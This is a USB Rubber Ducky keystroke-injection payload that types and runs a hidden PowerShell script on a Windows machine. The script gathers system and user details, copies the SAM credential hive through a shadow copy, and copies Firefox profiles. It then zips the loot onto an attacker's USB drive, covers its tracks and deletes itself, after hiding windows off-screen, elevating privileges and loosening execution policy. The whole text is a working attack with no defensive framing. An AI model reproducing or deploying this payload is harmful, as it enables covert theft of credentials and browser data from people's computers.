DELAY 400
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 400
ALT y
DELAY 400
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item  ($userDir) -ItemType Directory 
ENTER
STRING $date = get-date 
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' 
ENTER
STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" 
ENTER
STRING $SysBootTime = Get-WmiObject Win32_OperatingSystem  
ENTER 
STRING $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime  
ENTER 
STRING $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME)  
ENTER 
STRING $SerialNo = $SysSerialNo.SerialNumber  
ENTER 
STRING $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model  
ENTER 
STRING $SysManufacturer = $SysInfo.Manufacturer  
ENTER 
STRING $SysModel = $SysInfo.Model
ENTER 
STRING $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption 
ENTER 
STRING $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'"
ENTER
STRING $HD = [math]::truncate($disk.Size / 1GB) 
ENTER
STRING $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB) 
ENTER
STRING $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select  TotalVisibleMemorySize 
ENTER 
STRING $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB) 
ENTER 
STRING $SysCpu = Get-WmiObject Win32_Processor | Select Name 
ENTER 
STRING $Cpu = $SysCpu.Name 
ENTER  
STRING $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber 
ENTER 
STRING $HardSerialNo = $HardSerial.SerialNumber 
ENTER  
STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name 
ENTER 
STRING $graphicsCard = gwmi win32_VideoController |select Name 
ENTER
STRING $graphics = $graphicsCard.Name 
ENTER
STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1 
ENTER
STRING $DriveLetter = $CDDrive.Drive 
ENTER 
STRING $DriveName = $CDDrive.Caption 
ENTER
STRING $Disk = $DriveLetter + '\' + $DriveName 
ENTER
STRING $Firewall = New-Object -com HNetCfg.FwMgr  
ENTER 
STRING $FireProfile = $Firewall.LocalPolicy.CurrentProfile  
ENTER
STRING $FireProfile = $FireProfile.FirewallEnabled
ENTER 
STRING $Report = $Report  + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>"  
ENTER 
STRING $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired  
ENTER 
STRING $UserType = $UserInfo.AccountType 
ENTER
STRING $UserSid = $UserInfo.SID
ENTER  
STRING $UserPass = $UserInfo.PasswordRequired 
ENTER 
STRING $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator') 
ENTER 
STRING $Report =  $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>" 
ENTER  
STRING $Report = $Report + '</div>' 
ENTER
STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible')
ENTER
STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID } 
ENTER
STRING $addSlash  = $shadow.DeviceObject + '\' 
ENTER
STRING cmd /c mklink C:\shadowcopy $addSlash
ENTER
STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir
ENTER
STRING Remove-Item -recurse -force 'C:\shadowcopy'
ENTER
STRING $fireSaveDir = New-Item $userDir'\Duck\FireFox-Profile' -ItemType Directory
ENTER
STRING $fireDir = (Get-ChildItem env:userprofile).value + '\AppData\Roaming\Mozilla\Firefox\Profiles'
ENTER
STRING $getFire = Get-Item -Path $fireDir -Exclude extensions 
ENTER
STRING Copy-Item $getFire $fireSaveDir -Recurse 
ENTER 
STRING Start-Sleep -s 10 
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html' 
ENTER
STRING function copy-ToZip($fileSaveDir){ 
ENTER 
STRING $srcdir = $fileSaveDir 
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) { 
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER 
STRING (dir $zipFile).IsReadOnly = $false} 
ENTER
STRING $shellApplication = new-object -com shell.application 
ENTER 
STRING $zipPackage = $shellApplication.NameSpace($zipFile) 
ENTER
STRING $files = Get-ChildItem -Path $srcdir 
ENTER 
STRING foreach($file in $files) { 
ENTER
STRING $zipPackage.CopyHere($file.FullName) 
ENTER 
STRING while($zipPackage.Items().Item($file.name) -eq $null){ 
ENTER
STRING Start-sleep -seconds 1 }}} 
ENTER 
STRING copy-ToZip($fileSaveDir) 
ENTER
STRING $usbPresent = 'False' 
ENTER 
STRING do { 
ENTER
STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq  '}' | Measure
ENTER
STRING if ($present.Count -ge 1){ 
ENTER 
STRING $usbPresent = 'True' }Else { 
ENTER
STRING $usbPresent = 'False'}} 
ENTER 
STRING until ($usbPresent -eq 'True') 
ENTER
STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq  '}' | select Name
ENTER
STRING move-item c:\Windows\Report.zip $driveLetter.Name
ENTER
STRING remove-item $fileSaveDir -recurse 
ENTER
STRING Remove-Item $MyINvocation.InvocationName 
ENTER
CTRL s
DELAY 400  
STRING C:\Windows\config-34361.ps1
ENTER
DELAY 1000
ALT F4 
DELAY 1000
GUI r 
DELAY 400    
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 400  
ALT y 
DELAY 400  
STRING mode con:cols=14 lines=1 
ENTER
ALT SPACE 
DELAY 400  
STRING m 
DELAY 1000
DOWNARROW 
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false 
ENTER 
DELAY 400  
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34361.ps1
ENTER
